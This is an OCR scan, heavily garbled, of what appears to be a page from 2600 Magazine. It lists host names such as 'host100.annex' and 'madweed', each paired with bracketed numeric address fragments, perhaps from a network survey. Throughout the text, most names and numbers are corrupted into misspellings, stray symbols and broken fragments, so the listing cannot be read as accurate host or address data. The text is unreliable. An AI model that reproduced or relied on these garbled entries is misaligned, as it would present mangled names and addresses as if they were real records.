gaoomlng 1 1 55. l56[ gtadeelgh 1 195.251 gtNdnlreln [69.140] guiltvr?5ll29 iv S2?l guillyzesnofl 6.130] guiUyzcatlSi 6 1 3 1| ggtijnbarij r i W2\ Habil^roufl [64.HJ habilEpoL ]£4.7| hades (1 *| nam alpha 1 14.77] hxmbH|mn [105, 3( hon-gten [40 135] hartcirpilot [64.160] herding |1 5.100] harpInOStyche 13.242 hiifliaoa tyctw 3.245; h^rpin04 rycM? 13,246 harpi"05 tycho !fi.2*7 haipInOG tyqfea j 3.24a I’d I plrtOB lyti'0 [3.250 harpirt09,ulphi [14.240] narpiM&.P'phr! 14. 24:1 harpir.i 1 alp^a 1 4.244 h&fprnl2 alpha 14.246 ftn.rpn’ilS.alpha ! 14.24c harpih14.4lph4 [14.247 harpinH.anncx [24 250] r’.arphn 1 5. orion 12 6 £4 1 1 r.ffli'Jtup [122 01 1 htiaihJiiy |1B3 1| heaven ]1 7] neclor [09 66; halrcepHar, tycho £3, 171 ] halpme ] i 9u 134| 'inn .el SI. 42, hanculQE.#PlltM 1 1 02 115] he'eaiter Up [162.42] hareattar [1 31] lie'll iii IO0 1M IDG hditoftOl [114 101 htmtor 1 02 [IT 4 102 h6fllPFl03 1 14 103 heMarlDd M4.I04 ! iunl.ji 1 05 114 105 Merrier 1 00 1 14. IDS h antor 107 r 1 4 F07 banter 1 00 [114.106 ha,-'larlOBOQi 1O0.1 hWtlOI I0BQO2 tOfi.2 harttoflOSOM 10B 3 hantorlOflCKM i D6 ^ hai-torlQUOOit 106 5 hanlorlOBOGO IOB 6 harttorlWWT lOS 7 hsFJtprldfiOOfl t06 0 hs4ltprlOBOOfl 109.9 hftTitartOBOlO 1 OB. 10[ h *0101100011 1w.1i] hariEoil 0SO12 [I OB 12 heritor 06053 IDS 13 heTitafE0aoi4 104.14 herlloM 00021 10621 NtnlMlDBOEZ [1O0..22 imfltartMO^ hw.23; heri1ar1Q&024 [106£4- r, arisen 10M25 [106 25 ■ nil!,.: 1 1011026 106.25 H»ftkTlWD27 1W.27 hadtoriosoas noe 20“ Iwrttor 106129 100.129 hartlorl Wl 30 v:*. 130 hnrtl:.MOai3l IDB 131 hafilsrIMIK [108 132 haplior 1 0B 1 6& 106 155 hanlprlOfllSS 106 -SO hanlprl0fllS7 10B 1&7 htir I hr 1 0S 1 55 100 150 h(intpM0B163l 100 163 hainitPFtoeaoijaioe hwitPFtMSIO IDS. 21 0] rienlaFtOB2tl 1U8.2H] hanloriw 1 14.100) herMoFl 1 0 114.11(71 hantorlU 114 11 fl haFilprll? 1H 112'; lie'll Or I 1-3 H4.113 h«Yl|arl14 114.114] h*rtaf11Sl 114 115] henioFilfi jH4 n0] harllarBJ [114.01] hi-iiioi'32 114.32! herlibrflS [114.95] horllPr% [114,90] tvariitKO? [114 B7 FvernerBO F 1 r4.06] be* J66 17| iiiiaiiiive [177.4; nlctkAllytS 177,5] ti-iciflllvaC’ 177 6] hkHalivB? 177.7] SuchrillveS 177.fi] highofadfl [64.112] hlppTall 0(207.10; hippiail? 207 12 hipplaiie 207 is hlpplallfi 207 10 hippl,i:41 207.41 hipplal42 207.42 hlpplalSE 207. BS hisplalS7 207.0' hippMIflS 207 09 In’Hio [:j? 50) h*ldmwt*t [194.66] hoidniptive [90.S1 hoidnall [130.132] holdcrsar. ; 1 59 I33[ beldpaifrai [00 2] hvldrtlart [so 10] hylpprnnp [8S.103I holiaiFne [139.131 1 pallyfem &i 42] belly wood ;i23 iiO] 'lgpilonimnl [16? 1] hootlcKJsan 10 iS?10i Ihpallopaanl 1 ’ 52 III hooiloraanlz 152.12 maaslooinsn 1 3 1 52 13 hKtt0P*an14 103.14 hoofiPMeb 1 5 1S2 IE' hoPtiDO-aamo [iS2 TB hooppoaenl? 152.17 hOOtlOM4fl10 [152 10 hooLlPOs*ri2 ’52-3 hoptlocsena 162.3 hpp!la(Mari4 152 4 bOflliooaihfi 152.5 bOPileoionB [152.6 rtgoHoc^cn? [1S£ 7 f>pp!Ioce6p 0 [152.B; boallaostnO 152.9' spe lls [162.471 bgpMh*frl [97,013 hprrzon Irs [102.43] Opal l ann#* [24 l [ hoarl j IDO 1 1 haaL'rO [100.10 hoatT0O.4flhaa [2^ igo! hpat'O I inpflK 24 10V host 1 02 annex [24 K?i haatlOO.annax [24 m3; i ius-IO'I. iH'K iax [24.104 IIP51105 anna* [24,1 05 haadOO nnne> [94.1 tjfi liO8l107jnFHBi( ;24 107 haql 1 0fi. annex £24 l 06 hael 1 03. annex [24.1 D9 M Mill. inf** |?*,ii] heal 1 1 Ii0a.11] hosll iQ anngx 2* l ? 0 heal 111. ann^ * 24 111 ri lvj H12 an nex 24 112 h^na nnna* 24 113 noe-Ll 1 4 anna* 24 .in Iwjh til 5 a nnaaS 2 * 115 tieatl 16.annax [24.1 16 **akl117.nhhax [24 117 hoed 10 ahrtak |?4 HPi hcsll 10 annHx; ]24 its heal 12, annex |24 12] ht>ail2tiOD 12] htaii 20 anne* .24 i?D hoe! 121 annex. 24,121 ru?s1l22 aniiex 24 i£2 hosil^B Brinax 24 S23 hoa!124 unne* 24 !24 hMH25 Hhnrtx ?4,125 htts112# annex £24 t£& hoall 27. annex 124.12? hoxs12B. annex 24.12S heal 135 ahia*it[24.l29 fiobH fi.annex -24 1 3] hoel 1 3 ] 1 00 1 i] r-oEJ 1 30 .annex 24. 1 30 boal 1 31 .flfioax : 2*. 1 3 1 nc*1 135 .ms. ex 24 152 *hjeU 33 anoax r 24 1.J3 hoatl 34 .annex £4 134 opal 1 35 .an nex 24 135 heal 136 .inneji 24 136 hpxll 37 ennax 24 1 37 ho=i 1 36 .ton'. 1 x 24 I Jfi haeL 1 39-.a ’■•nex 24 i3Q he&L14 annex |24 i4| hesH4 [100 .14) hgeH40 eiineic [24.140 hnsti4i arinmi [24 1 4i hoat (42 .annex 124 1 *2 heat 143, annex [24.1 43 hpxL(44 u.nnan [24.144 he*iS45.ann*x [S4 145 hpst14fi annei [24.1 46 hoslin 7 annex % 24, 1 47 haaM4fi annex [24.1 40 h Mil 49, annex £24.149 hrp?) 1 S.g nntw 124.15] heel i5 [100. 1 rij hpaH50.annex [24 1 60 heal '51 annex [24 1 51 hear 15? .Lhriflix [24 152 h oell S3 jnnfi [24 103 hwl 1 S4 .annex. 2,4. 154! heal 1 £5. annex. 24 . 1 55 hosi 1 50. annex 24. 556 higxi 1 57 annex 84.157 n^ai 1 5 1! sm-.ex ' ^ '5f hoallfiSi annex j 24 159 f.oal 1 6. annex f24 16] eieailn |IOD 16| trailed annax ?24 16O hPG 1 1 6 1 annex ?4 101 hoal 1 62 an npx 2 .1 1 02 Jvp5l163.anrex 24 153 Heal 164 ennex 24 164 bOaH05 annex 24 160. hen 1 1 66 annox £4 16S hoal 1 67 annex £4 1 S 1 aai i60 .annex 2* I6-& hppHOS drtnex 24 169] hoeH 7 .HFUigs | £4 171 hostl/JIDO.I?] hpstt FC.a^nex 24 1 70 hnaU71 .anntx 24.171 Imr.L -72 flhfinx [24 172' hesri73 .-innnK [?4 173 hoekl74 annex 24 174 1 haeM7s.-5.nnex 2* 175 hast 176. annex 124 i76 h(HM77 annex S24 >77 hMI178.nnf»x! 24.170 hmll 7B. annex ]?4. 179 heal IS annHFX -24.1 61 h^aSIfi I I00.18F hsfli 1 VI. annex 24. 1 60 hmil 181. annex 24.151 hoflll 82 annex 24.102 hosllea apnnx ?4 103 h.ri.iHS t annex £4 104 broil 65 annex 24 155 heal 1 66 grrhex [^4 105 hoall 87. aftn*X J4.1&7 hPSMBS.annnx £4 100 nciEiia9 annex t 24 189 hrotl 9.«nnex [24.19) hmllS 1100-101 heat ISO annex J2 j 1 190 hc, annex 24 249 haat2S [ISO £5] heat25S annex 24.25 1] heaE252. annex 24.2521 1, osl£53.jinnax [24.253] Jtaet26 annex [£4 26| haat26 [100,26] Haal27. annex [2* 27] hest?7 1100.271 liM!2fl annex 12^.29) r™i28|1O0 2B] hoat29.anrm x [24.29] I1G6I29 1 100.29-1 hf(8i3 4irne* [24 3| hMS3 [100.3] hca!30. annex [24.30] n oal30 1 100 301 heaiS !. annex £24.31] hroi3l |tD0.3i| Ho*l3£ ariDex '24 32 i he a 1.33 apiiex 124.33] noai3'1 anitax; 5?4.34| MoailS. annex 24.351 nosi JO annex |24. 36] hP6l37 anT-iex j£4.37] hPBtfifi an-hnx |£4.39] eeatfiB. annex |?4 99] neal4 ,.nrex ]24.4! hee!4 |I00.4| bpar40 annex 24 40 -pat4 l.onlie* 24 41 SidbMB .annex £4 42 ftp8t40, ennax 24.43 hoet44 annex £4.44 hpst46„gnnex 2a *5 iseel 46 .annex 24.46 11ME47 annex ?4 47' i)oal46. annex 24 40 noaE49 an^ex £4 40 hpas5 Annex [24 5] hueSS [100 5| huSSSO. annex 12* .00 hasSSl anr-ex £4&i hQs:62 an-~ex 24.52 h 0*1 53. aim ex £4.53^ hMi54 4F1XKX 24-64 heal 5.5 tinners \2- 5'i hoaiSS. annex 24 56 1105.57. annex 24 h'l host 5-0 annex [24 53 beats? .ninex l 24.5? bpstfi. annex [24 8] npfftB [1G4Jfi| boareo. annex £4.60 noetBI 1 iinex 24.fi 1 hpgtSO nnnex ;-J 0? hpa!B3,annex. 24.02' hoattM . an^ex £4 fia hes165 ennex 24. B5 lie^lGS .trinflX £4 66 hoe(07. anrvqx ?4 67 hasl6it. an 1 " ex £4.60 hoa109. enrex 24 eg hortT.annax [84 7] hew? El CD 7] hcre370 ari'-nx £4 71 hoa$7i ennex 2 * < 1 hoaJ72 ennex 24 72 hffitl73 erl'.QX [24.73 ho n i74 Annex 24 74 hoel7i .ir'iinr £4 75 hoslTS annex £4 76 hoa177 annex 24.77 hoal7B annex 24.7B heal 70 .trtnex [24 7 5 noclfi pnnox r?4 6 1 noare [100.8] pperea annex 24 60 neetEH annex i‘24.6 1 :' bOat0? Alines [34.62 hggt83.anrics 63 noetsa .annex £4.li4 ".□6505 .annex 24.65; iiir, r 06. annex. 24.66 npet67ennpx 24.67 hoatBS annex £4 66 naa!09 annex £4 69 heai9 .annex [24 5- Iieul6 100 6]' bosC90.*fm*h ?4.90] hwEfll. annex 24.9 1] r,eet02. annex 24.92] neat93.annex 24 5oJ boatR4.annftx 24 54] hMt95.»nnxr* 24 -95] hPHtOS. annex 24.&61 bp*CB7. annex £4 &'] hnstBB .annex -24 56] i-.nEtog annex [34 99] hPlh.Rmpire.eDlipee [102 138] bp-221 .alpha [14.82| Tp2 t 01-222. alpha [14.1 2D 1 fipZIDfl-rai.emcin [23.2 [ •hp?i0Gr?1 lychp 13.43] np5£i [32.2B] hps|4-1 [33.311 hpl|4i-2 [33 021 hpIJSM [32 27] hpen'MI: : 39 155] hqenHE402 169.196 hgemiB463 1 39 197' h£*em|*404 S3VI9B h^iraia405 139 201 hqemnm40T M39 1931 hQen'nmSOI [139.200] htempi4ni 1 39 123' hqel-ni 1-402 139 194 hvbbtq edrpM [IDS Of] hurnpB0 3' |40 Ia'S] humcane |1 S3. 1431 hlitCfthtrfn [1 S3. 134 1 hyflra bctipse [112.116] hyflrnzfjun [40 1 96 1 ice 13£,4fl| tcePerg 1 1 113] rceeold [32. 97] pC^ttutif 1 32 95] irohouar [32.98] icelaa |:. : :J >6. KnmtKlal.lla [10S.t21] immerlal [1 .3S| intprneshullCsW [40 59] rndrjtna [30 1 3] .nfenup [32 14] nheeime |32.85'| mi and-eiLer ]40. 1 74 1 mlaiMle [40.44] Inprer-P55 [66.lO£] ■napecrre&E i(jfi £6| inlenaslighl [S39 162] untuned [123 1] inlpjrnrlld 120 10] inlomUtl 193- n | inlarnall? i£3.t£] inlernell 3 [50.34| lniemeil4 |123.14] Inifl'iiri I fi 1£3 If,; mlsjrnoll? 133 17] iniarnedfi 1 23.1 61 In lei he H y [123.1 lnlorntrL2 [Ut3, 2] IblornMEO ri?3 70 in!#rnet?2 [123 22 Ielernet23 i?3 £3 Internel24i 123.24 IflmnelOF. [123.26 I y I- IN 14 3 1 12 I 31 mternetfiO [90.82] In tamer a; [12H.4] Page 42 2600 Magazim met42 120 42 ■miivHP i£3-48 '"iMqi47{T£3 47 uineiS £ 123.5] ■■I 1 no 5ntMl £Ot.151 i 1* gnepy |91 10| ,ad«eua [91 175] 1 n iixim C9T.14] it inf n nwifter [92 44[ r Ni.sri^nl [92 Ifi] ■ In, r.-gr 191 170] 1 lociear [91 28] ededoek [91 9] A.Jadub [91 13 If 4 lei,'£|lor [92 ,16| * ton Ilrhul |02 35| * lecnol |9? 7] ■ ip > ypher [92.43 1 1 iit.iaily |9l.1?l] . 1# Hence | HI 169] - imuwapun [9S 25] . if, 1 [91 194] Iwiladmy E9l £32] ■ !,u j'92 40] . ■- ini 191.221 - \* luck *9 r 102 1 * n enabling |fli 197| ■ . . . :lua |9 I 142] n 104 | D.'il . • ',,J |4l 104 1 1 1 ■ ' ^ m. 9 1 . 1 80] . *-k*imge [02 421 > .me |9l.T0fi] I LWaueiehlE [91.140] , 'r.jdi.n [92 S| 1 ifjiflis [61 120] ■ i-.ji : n* j 1 9 1.222] s.|*lui'Js>e [91.1 77 1 * Ini'.* [91 15E] * itiawei [92.151 " rl [91 176] * hillgiht [64 1 56 1 tilt ■ |9£ 10] fellernrt [64.46] , i.ijpi.ig|p]9l 19fi| totnagma 191 2] •- n.-iir.-iw jr'.i A [ ,| 1 • III, -lien [01 190] [91.1 34 1 1 ir 1 1 1*1 1 ,'.l [92 2Q| Intnelltiaam [01 23] 1 in myth [?1 1G£[ . l«rl4>M«i |9t.101 ,1. ,. ii ] .' 1 i £.? . I ■...•III ]5£ 25 1 * n - iJrff ?31 - ’d | 1 1 1 *1 iirDCe [01 . HHJJ 1 :. |9l. S3tl | * htpenuri [91 -1 iit|iifio |64 153f - iit| urra Ifl 1 22?| 1 hpiiihl j(H i60| * Pr uuftl [82 11) R. topri^e ]9£ 19] * Htiji.ia rt [91.172] - laguteli [92 27[ ■ '"•ill.:* fin ]92 £0] .■■■, in [9i.£B] [gi. tea] ■ 'Mill I I |01 153] t "tin h |#1 22S| [9! ?76| * ■ .air] 92.9] . j in 1 161 1 .. n |V1 1961 1* ■ r.i 1 92 1 4| ■ 1 111.1 i'Ji 138] ■ X11I1 | '12 4 I [ r ■ | Ri I 37] ■ f, -H fl'Di] < ,. ■ | m xil [91 7] , h 1 M“-. |64. 3S7| 1 .. it 1 91 2K'i' ,. 1 9 J .165] 1 ape [91 152[ - »hn m |fli £4 1 ■ 1 . ■ iv [in ise| leiloeuTTEpD! [91.235] ledeleal |51 143] leaenger [91 .147] jadaieke:’i |91 0] l.idnEr.i rln [fi? A I ladaErail [fil 15a] iaSetrPL'1 [92. 12| ladevaler [92.31 1 >OevulH«e [9£ 0 1 iqMvaniais |9l 146] jgdiavapcT l.d 20-D| iBdievelvei [92,32] - adeivetei [9? 34] f adirwalXgi S91.1K) f arJewfl||ei rgr.iOSI igiin^alph |9l .19] ledowex 01 156i ■aoewiid 64 102] ertUwihJ 91 17Bj ectewpllsbane [01 . 1 39] jaijpvach! [0 1 .26] lacreyam [92.36| iatseyellow [92 371 ,emo7nt:.it r9£ 381 jec'azinc [01 175] atlez:edias ]9t.136 sin ug 129 196.5 29 ; airleg1 30 108-1 3D ;itl'lur|13l 106.151 felftogllE 108.152 lainugl 33 196.133 : :-lli..y 1-3-J 195 134 |4I0 hb 13S IBS ISIS |*IHng1» 106 136 alhug137 19B.137 alll'j.pl 36 100,1 3B ailing 139 195 139 all1u0l46 IBS 140 9IBU0141 106 Ml ailing 142 T 96. 1 42' alllug 145 195.143 alllug 144 IBS 144 |ailiugl45 TBS Mr, laiHuyMS 196 146' jeilUl(jH7 100 147 a iku-A 1 4fi 196 MB aillug149 196 140 : dJ|IU0iSft 190 156 .illiu 0 !S7 196 167 a6 2lr «IIHi*g212 196.212 all1ug213 196 213 |alMu-g214 IBS eta ]alllug?16 I0S2T0 bmusat? 196.21? leillugZIA 106 216 |aillug£l9 1 96 210 |ailiLtg220 11 90 ?j?fi |iil'uy?2i 1B0 22I |ail1ug222 125 222 jaiHug52S 1 96 225 .aULug226 196-820 ,Binufl227 IM ?£7 iVUvgSSB S 96.220 ,.:iilug£2B 106.229 jailrug235 196.253 iaiirug234 [196.234 iaiilug235 [1M-23S jam ugsi e? rifts i6/[ nneE inlehrik. gev 1 40 203] ezzPand [5 4] Sazzawing [SS 6fi) jeriporden [00 8i] immeharp [04.751 anFiyi-.owlei |B4. 13B[ , c-rkpumf. [65 21 1 l*rry [54 2] sel&luis elplia [Kft2] loirne Ha [182.41 el Bam rao 20 1 1 c-laen Its j 162 12| e*h«TWiiPt [fU.flrf] Tscxyiinp.iyphn [3 £| wnlsnafcfltorlon [2fi.29| Glttraa [07. IBS] pabua -ediiun id rj lumpypeu [37.??6] lunglDnag 1 93 [88 1&8] Ung|#eag1&4 55 19-1 lungieE i g 195 66 195 lurqleaeg 1 96 fifi 196 |urigl*Bag197 [06 197 [Mngteang : 90 [00. 1 96 psiigiesag ! 99 [0fi, ! !)9 1 ■ -91 r-s ag£0Q [BS.200 |.j-r.gle&ag20 1 [BS.201 jungl«sag202 [06 20? luuglftBiig203 [Rrl 203 |unle#cnplaFn [49 165! iuFikyard Ha | "62 99] uallce : la [162.14 1 1 hapuale .‘171 139] kapuxiel |t 71 ISi] kjtpualaZ ji 71 132 keenly. He ] 162.131] keenly [1 .71 1 Kenneltram [i5S 133] ktirkfi ]1 64] Mockknock r65.2ti[ knockmeEar-147 ]64 53[ knockmaler [84.54| hi if; id^y.lla [ISf 7] krnrhRT [34 5] iHtolbel: 164 32] laieelbox [64. 02] lobfllcau [64 2*| ■jbelcteL k [64,33] ,ntivl;,ich) 164 2fl| lotwHape 164 1 30| labelvele [64.23] Ahelvoie 1 54. 26 1 1ob*l weed |64 135! lucejidrili 1 40 70] iarieereham [04.7fl] •?.ng1 rala |155 I44i ishpiut-e 1 -4. eipha [n 235] I&ri[ f iut>el7.-el.iy [17.2361 luhpretKiES erlen |£G.£35j : L’.pdi6is'g [1 09] tar^bban [5*. 1-33] I are. Its, [lE2.05t maalle [6* 0S| las-pirhghi [OA l fi] laeer^iaefd |i3y.73-| i eje 1 (76.131 laudaniAe [4D 3-u Id ULln liln-ehor: [*£> 42] l*mrpiia [06 1] lehpdirr.p f 1.43 1 lehurne [32 84] lemai izlniger' [ 1 S4 5] IfrfiMOk £4Ci 36| lap Bclip&P i 1 02 1 1 J' lee 154.10] lesaangluede? [212 27| lesetK-.gl.bed9 [212 E>] le4Kin^U*dB?E21£.9?[ FaeocnQiuedBO 212.96 lathe [32.21] : exrr.Efh ryehe |3 ?36| le* m,nrk524. alpha [14.75] li?xe,erkF251 ry^p [fi 2671 I'barty [00.20] Irpra [15 i32| IHe 1 1 I0| IH*a|p (32 91] IlfMriddealh It 931 lltabeil 192.73) Uleblke |34.3i] IHrtlwd [3? 77! iii-tlo wn ]1 1 06 1 lileSual [3*. 14) Hlebupy [l.W| Waceieaf [32 09 j ■itnUn'rtSi [32,661 illechpp [34 13f i f ncpsJ& S 1 . MS] Recycle [52.71 1 (ireaeiTiantli [1 M71 nfa an n. 1 1,1 07] iga.sf urea-id [32.615 nieairsdrna ]32 07| nrahnsafi J34 32] hfafly [3£,03| liWough) 132 02 1 lilega-rne- ji4.3S] Hequare 134. 1 7| lilehiaiety [1 9i] IrfOhutti [S?.ft2] IdehuTtEma |32 66| litomau ranee |34 j 2B] IrleiEatUasr |1 .65] lilerabati ;34 R6| IHVaeool 134.39] plfeis^ppU ]1.§2] ifaiah-aro ‘1 .35 ] JlMatong iSa.03] ifeisfiirm [34 £8[ SfemekDi ]34 16] ri'oiordiin 132.90 ireless i 1 .34'. Ilfal.'hfl [32 63] iKehne -24 rm EJltlbl [1 671 ritelong [32.70] iilempkeha [32 77] I irernytfiu d 11S| [34.21] hreepdapir-. ]32 1 9] hlpparty [04.33) lilepeei |32 75‘ MeppHi 1 3* 031 IMopeur M |34 £7] lilcpreBerva? (94 20J liler [-32 76f lileiaS [34.16] lllerupi [34 3D | lilbEabaach [’ 62] IHnaaver [32 S7! JltBWving (34i 2!2| HJeafnrh [34 37| ilJaeh-nei [1 1W1 HSm[« ji 8Ri n?aatin!cE Ti 60| iHaalch'y [1 103] 1. lesryl-u 1 1 90] Mesis-m : .J4 29 1 blatePie [ 1 . ?*] lil-nL-ker [1 .031 IKettila [1 1D4i IHtFtinn 1 3? 74| IHmwW L34.I0I llle^crk 1 1.80 1 HQhlraom.orlGri |£fl 2S[ limbo |1 6] libcoln Us [162.63] IIMWln [IS. SOS] iiriemuch- prase [574.S29| lirwmuch-road [174 1301 llaAeaellfl [iS6 i54 1 llonbrow 1150 15C'l lionface [1 86 165J lionrpot[156 160] Nonfuasli [166 1ST] honh-num [158.159| llonovi [lira 168) llaiwe ard [156. 16-4 : lidnetcne M 56 147] ItenhWlb [15D 162] llonweijfhE [t 56.165] ll&£.d [4Q.1I liir-u I apeatfy [*5.60] IHtledtoud 108.741 iltrlesli.b [66.051 iirrleaper [98 77 ittJflfiill i% 1S&1 BHJ*nape [ 123.34] nrilpislandi ]fiB.0$] iihiai3iendi 32 Elite I32j llttleialentH 6 1 IS 151] HttialatenctS 68.66 hlbeiEiand-l SB 90 1 ill distends 80.0? IdUieislAndS ]BB 04 i.tllelmk 1 1 96 224] 1 -i I email [96 70 1 Mi ec'-e [95 00. nliiopian [190. 1[ Wlleport |1Z3 1111 |.|1'et-i.ir | Of, 68] I mile team |66 69] 1 ii >iin-.e [Bd.66] Iflisieratiell [0fl:fi7| Itmgruir [1^5 14’,] lerax *pj>ch [2& 139] lolron [aO 1 40] l.-1-rt ■: e he 1 152.100] l,;*:,FB2 tli. |162 IDS] lubbeTlrmH [1.301 ixoptms-rSl u p^pn [26. 1 1 mec-hel ibol. tychc [3 39] met alpha ]1 4.203] m ptinix lla[162 55] matJviirnb [ 1 54 £1 : .naev-pprj 1 ;i54.2o] madweedio 154 in rhauweetlll 1S4 lo| madweedl? 1 54 Q maoweod13 1 &4 9 madwaedH 154 7 iiiacHaedlS i fi* 6 rredykeeb? [154 IR madwebSSO 1 5* 32 rn-edwped£l I54 3C, niadwaed22 154 31 i-i^dweed23 154 23 TindveuadE* IS4 36 nad^nux!2S IS* 25 mad^pa{J26 154.27 fliadyraBd?? .154.24 ’n:ii]«i,nee20 154 23 mabiMPlKFB 154 £8 ma-3rwpari3 MS* >01 rnadweadao 154 1] ,'nnd^«ed-5l 154.35 ■ti:-,:3weed52 ’54 3D madw«!d33 iS4 37 matfwendSH VS4.3B mat1rteed35 154.30 moir-rttL-djfi 1554 40 madW*dIJ7 '04 4- madwnfldM ifi4 42 msidwMd3fl i S4 .4 3 madweed* [15* 17i madwaed4Cl '54 44- rr,gdwaed4t 154 45] madwebd*? T54.46] rr.adwnedS 1L.416 ifiagtVBfidS 15-4 15 mesJireDcJ7 154.14 mACUxL'tidR >54 >3; madonna!? 154.1? TiagiG [66. 1J irianeae [t.72| (flShfliwe. H& 1 162 1 24 1 ■N4ngHSvi L M R7| mapuftitll |4 0, 1 37] marara 11)0.2] (TieiffW | -32.63 1 maannms [32.60] madieiiaU [54 4fl! maF'in-qie&l [8S 0j rnelefir oedpae |102 7 1 i maLiihflw.ljcihg [3.1&4: micron alpha [14 64] micrelim [R9 3; nbddlofflpbl 1 1@0. 1 30] nudiSlamaoi |B5 ! ’■ ; mull and [36.97] nudnmyi !±ir-sh*h (153 1] abdiahOtml |153.?fl] midlandbaarn f 1 53. 30] m Uhmu: las - 1 £ 5 L L . 1 1 1 mpdlwndcanHry [15-3 4| mtdlandea rtu.-- ] 1 53 ,3] rn-dianrlriijmejsii | >S3.i B| TFiibla ndetyr amlte 1 1£3. 1 7 1 irirdle r.daxplcae 1 153. 14] rtiWIaedgolb [1S3-B] miaian-dldnifc.-n [s 53.1?! ml£Maribrtilnn.mi]i53 2] nutluiri -inu ;]ii< -l (1 1 5 1 mid androcifholl |V53 13] midfsndEiaie C 1 59 s> nittlandEmeka I1S3-D1] ntidlandelnke [15S 10] rbidljpnttewlErfUirjlfa.S] midiandlelon [1 53 25] m.idlanci'.ppre [153 19] rcndlindlmn. 1 [1S3 7[ nndtoncbifiicn L I TsS 16] m dljmdvflin [183.9 1 dl-lfl | E Ml | mrllBbla 1 1 .50] mrt|l*F*um lit |1 02.31] nungirerlypenor [153 £*) n'inevarmEhi38 [is* ifiel minevarrw&h 1 37 1 184 137] m mef am ;Eli 1 3fi j 184 1 3&J n-iiievain.nhi in [104 139] MlinlhP»r™Bhl4t! Mit4 1 40] nunevamiE-h 1 4 1 [164 141] m-inevam =hl42 ] 134 143 ! rTvnevarnF&fi 1 4 3 [104 1431 raiiraclerTi.an 1 [114 13] mrraclomBnlO [H4.80 mimctatnanvi n 4.62 rriLraclentanl 2 1114.66 imraclemanl 3 [114 67 miraelbni.iril 4 [114 &t mtradbiiran i S 1T4.S6; ■niracleman 16 [K4.69 -niracleman? J 1 1 4.63 ■niiaclepnana ■ 1 14.7? i ii ■ ncle in ;i n5 H4.73 miT-elbrtibnS 114 7* mipucleniinSB [lta.&fi] mifaclemsn7 114.76 miffldsflianB 114,77 pTinaelDmcn? 114 7| rnl^di^a lycho |3.12?' mo^Duah : | ’?s e] mobcushTB [1 SB. IQ' mat-push 1 D I IR0 161 metrcuali 103 190 163 mebpuahi04 199 104 mgbpueh 1 06 106 I DG mabfushl 07 1 1 90 1Q7 mahfiuahl D0 1 -99 149 mebpg E h1i [180.111 mebpushl 2 1 15)6. 12| maboueh 1 20 [ 1 96 . 1 29-| mabpuahl? 1 1 9fi, 1 3] tnobpusb 1 36 IBS. 130 fli&Bpuni-ilSt iOfl.131 •rid ispu e -ii 32 ' 06. 1 32 moPpuEMi:; EE10 133 mobputih !34 ,90.134 nohpualtise TR9.13S mehpg 5 nOO T9S >30 mebcushia? I 190.137 mobpuEh13B 1 9B 1 30 mebouahl 3? [180 13B : TObUbsH 130-100 [139 l M| n-rabpush 1 39 1 0 1 1139 1O1J m-obCKJ&hH I E9fl. raj mchpush 14D 190.140 moh(Hijh141 ISfi.141 nehr.,,-.l,14£ [196 142 mobpush 1 43 [l?fi.l42 m-Db[KJ5h 144 1 90. 1 44 mefipuflh146 198.145 mobpusni4R 1% 148 mempuahMO 1% i4 0; nn^ppas-TlS [1 90. 1 5] irr-pppuEh 1 543 IRS 150 marjpusJtlSS ER8.15V nu>bpD*h182 19S. IS?' ■nctipu Bh 1 S3 196.155 macpuablW 190.154 mabpuanisS 190.155 maBpufihi5S 199 156 mobpttthlS? I 98. 1 87 m0bpuxihi86 I9B.156 mabpuahE59 1 90. 1 59 mdbpuahIG |iR8 1S| || .uht'UKh 1 FIC- 180,180 1 it ib push 1 01 18&161 rnebpup»bT02 160.162 mdbptrah>03 100 165 FTIDbpUfif I 1 64 I hi 164 mebpuahlfiS 19R.16S imatipush1% 1&&I&6 mGbpu-Shl 6 7 1 58. 16 7 ThObpu E-", 1 66 1 98. 1 6 fi mobpira'm 69 1R6 (69 : "-.Up jg.h17 =190.1 -'I mobpuBlil 72 [19S .i':aj mobpusblS il 00. Ifi] rriDdpusbIS [106.10] mabpush? [126 3] snuPpunh?0 190 Ml ■rietipu ab£ 1 l90 2tf mdfcpuaiit! 1 9 J 1 50 .2 1 9] macipuar>22 190 22 maibpubrifO 190 23 mebpuxn?* 196,24 motrpuihSB IM £5 mebpush26 106 26 n-.ccpuahZT >99 27 iTiDti,.iiah26 1R8 20 mubf3u«h?9 13* 29 mpbpui.h3 ] 108,3| mpbprUBh^O 196.301 mabpuahSt < 56.31] mebpuahS? 138.931 mebpuBhJR >98.39] Iron b pus hH 10S.34] mobpuEhOS ! y&.3&] aiebpT&h38 IRS 36] ri>citipii*Ji37 1 gg 371 iiiebpign.hSS 1 1 90.30] "iobp-j:Eh3S 1 98 39] n-mbpus,h4 j Fyfi.4] mcbpuish4D [190 *6 mobpush41 130*1 mobpLi4H4S [19B 42 mabipuri>h4 9 [lfifi *3 mDbpue+H4 190 -E4 mobpLi Eh* 5 133 45 mobpusMfi 198.46 mabpuaii47 igti*? mnbpi.iqJUfi 106 as mobpLLai>*9 Ego.*? mobpusns [ 1 90,5; ma.bpuah5(? 19S.5& mqmpueitBI i-98 01 rne-bpuahsa 108.52 mobpuBhSfi [13B.53 n-iobpuaJi&4 130 54 mobpuehSfi IM 55 mobpudh&6 IM bt: mobpuaih8 -' i&5 57 mobpuHF-.tiK 5 3f3 56 mabpuohS? J3fi 5R mabpusli& [1 B0 6E mobpueinRO [198.00 mobpuahSl J 98.6 1 ma,bpU&E>62 198.62 ma>bpu4h£3 196.60 mebpuah04 196,6* ifDbpLiBbeS 196 65' matipijBihfib 1 96.6e rraspu&h67 190,67 (ncbpuehfiD IRR60 rnebpRishfig- [19R..69 rFrebpwah? [108 71 -r’dbpt-Gh 70 1 95 70] .-robpushT 1 • 1 10 .71 1 mpi5puah7?[1R0-7?] rnabpuah73 f 190 ,731 (MCbp :Gh74 1 1 SR ?4| mcbpc&h 7S [130.7 ij mobpGEhve [ 1 PH 76 mctipijshT? [130 7?] mobpuah7fi [190 761 mobpunh7D [i?9 7fi? mobpu:;h0 i I9fi.fi i mobpuBh80 ! 1 36 GO mobpushBI [1 30 0T mabpusha? [i3 R b;^; m«bjnjn nfl 3 1 Bfi 03! mobpush&4 [i3fi.04; mobpusnB5 [130-BS] mobpu 9 v.06 j 1 9fl Hr. mobpusJi07 IM 07 mObpusoOs 1136.08 "’CHbpoB.hSO [ 1 90.69 rTvafepuahO [190.9] fl uPp-uahUrF [1 R0 ,W] rmeckPudk [07 681 irvCKd 106.10) naaLeanake ] k.79[ mpoTioglai [40. 195] mortal II* jlfl?,iaj mo*e* 